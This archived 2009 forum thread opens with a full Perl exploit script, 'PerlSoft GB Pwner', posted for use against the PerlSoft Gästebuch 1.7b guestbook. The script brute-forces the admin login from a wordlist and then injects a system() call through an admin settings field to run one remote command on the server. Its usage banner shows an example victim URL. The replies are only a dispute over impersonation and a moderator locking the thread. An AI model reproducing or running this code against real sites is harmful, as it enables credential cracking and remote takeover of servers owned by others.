PerlSoft GB Pwner

Discussion in 'Archives' started by d3hydrate, Jan 24, 2009.

Thread Status:
Not open for further replies.
PerlSoft GB Pwner
  1. Unread #1 - Jan 24, 2009 at 4:30 PM
  2. d3hydrate
    Joined:
    Jan 24, 2009
    Posts:
    6
    Referrals:
    0
    Sythe Gold:
    0

    d3hydrate Newcomer

    PerlSoft GB Pwner

    #!/usr/bin/perl
    =pod
    Typ: Bruter & RCE
    Name: PerlSoft GB Pwner
    Affected Software: PerlSoft Gästebuch Version: 1.7b
    Coder/Bugfounder: d3hydr8
    Note: RCE ist only 1 time possible, do not waste your command!
    =cut

    use strict;
    use warnings;
    use diagnostics;

    use LWP::Simple;
    use LWP::Simple::post qw(post post_xml);

    my ($url,$user,$wordlist,$error_counter,$word,$anfrage);
    my ($falsch,$richtig,$entry,$rce,$send,$crypted);
    my (@response,@rcesend,@array);

    if (@ARGV < 4) { &fail; }

    ($url,$user,$wordlist) = (@ARGV);

    $falsch = '<tr><td align=center><Font color="000000" FACE="Arial">Nur Administratoren mit g&uuml;ltigen Benutzerdaten haben Zugang in das Admin-Center!</font></td></tr>';
    $richtig = '<tr><td bgcolor=#E0E0E0 align=center><B><Font color="000000" FACE="Arial">G&auml;stebuch Vorlage - Einstellen</font></B></td></tr>';

    if ($url !~ m/^http:\/\//) { &fail; }
    if ($wordlist !~ m/\.(txt|list|dat)$/) { &fail; }

    print <<"show";

    --==[d3hydr8 PerlSoft GB Pwner]==--

    [+] Attack: $url
    [+] User: $user
    [+] Wordlist: $wordlist

    show
    open(WordList,"<","$wordlist") || die "No wordlist found!";
    foreach $word (<WordList>) {
    chomp($word);
    $crypted = crypt($word,"codec");
    $anfrage = $url.'?sub=vorlage&id='.$user.'&pw='.$crypted;
    @array = get($anfrage) || (print "[-] Cannot connect!\n") && exit;
    foreach $entry (@array) {
    if ($entry =~ m/$richtig/i) {
    print "\n[+] Password cracked: "."$crypted:$word"." !\n\n";
    if ($ARGV[3] =~ m/yes/i ) {
    print <<"RCE";
    [+] Remote Command Execution possible!
    [~] Note: Only _1_ time exploitable, do not waste it!
    [+] Please enter your Command!
    RCE
    chomp($rce = <STDIN>);
    $rce =~ s/>/\"\.chr(62)\.\"/ig;
    $rce =~ s/</\"\.chr(60)\.\"/ig;
    $rce =~ s/\|/\"\.chr(124)\.\"/ig;
    $rce =~ s/&/\"\.chr(38)\.\"/ig;
    $rce =~ s/\//\"\.chr(47)\.\"/ig;
    $rce =~ s/-/\"\.chr(45)\.\"/ig;
    $send = 'loginname='.$user.'&loginpw='.$word.'&loginname1='.$user.'";system("'.$rce.'");print "h4x&loginpw1='.$word.'&loginpw2='.$word.'&id='.$user.'&pw='.$crypted.'&sub=saveadmindaten';
    @response = post($url, $send);
    @rcesend = get($url) || (print "[-] Cannot connect!\n") && exit;
    print <<"END";
    [+] Command executed!


    END
    exit;
    } else { (print "---====[*******]====---\n") and exit; }
    } elsif ($entry =~ m/$falsch/i) {
    $error_counter++;
    print "[~] Tested ".$error_counter.": "."$crypted:$word"."\n";
    }
    }
    }
    close(WordList);
    print "[-] Could not be cracked!\n";
    exit;
    sub fail {
    print <<"CONFIG";
    +-------------------+
    | |
    | PerlSoft GB Pwner |
    | v0.1 |
    | |
    +-------------------+-----[Coded by d3hydr8]-----------------------------+
    | |
    | brute.pl http://opfer.lu/cgi-bin/admincenter.cgi admin wordlist.txt yes |
    | brute.pl http://opfer.lu/cgi-bin/admincenter.cgi admin wordlist.txt no |
    | |
    | yes = Remote Command Execution |
    | no = No Remote Command Execution |
    | |
    +-------------------------[********]-----------------------------+
    CONFIG
    exit;
    }
     
  3. Unread #2 - Jan 24, 2009 at 6:01 PM
  4. cp
    Joined:
    Jan 30, 2007
    Posts:
    3,278
    Referrals:
    6
    Sythe Gold:
    0

    cp an cat
    Banned

    PerlSoft GB Pwner

    Not the real d3hydr8.

    Gtfo, please.
     
  5. Unread #3 - Jan 24, 2009 at 6:11 PM
  6. d3hydrate
    Joined:
    Jan 24, 2009
    Posts:
    6
    Referrals:
    0
    Sythe Gold:
    0

    d3hydrate Newcomer

    PerlSoft GB Pwner

    Hmmm. Cp from DarkMindz? Smd 4 free bitch

    Real enough
     
  7. Unread #4 - Jan 24, 2009 at 6:19 PM
  8. cp
    Joined:
    Jan 30, 2007
    Posts:
    3,278
    Referrals:
    6
    Sythe Gold:
    0

    cp an cat
    Banned

    PerlSoft GB Pwner

  9. Unread #5 - Jan 24, 2009 at 6:40 PM
  10. Swan
    Joined:
    Jan 23, 2007
    Posts:
    4,957
    Referrals:
    0
    Sythe Gold:
    0
    Sythe's 10th Anniversary Member of the Month Winner

    Swan When They Cry...
    Retired Global Moderator

    PerlSoft GB Pwner

    Locked, etc.

    d3hydr8, I hope you know that impersonating warrants a ban. Explain yourself.
     
< Facebook Brute Force | ~selling Gaming Template~ >

Users viewing this thread
1 guest
Thread Status:
Not open for further replies.


 
 
Adblock breaks this site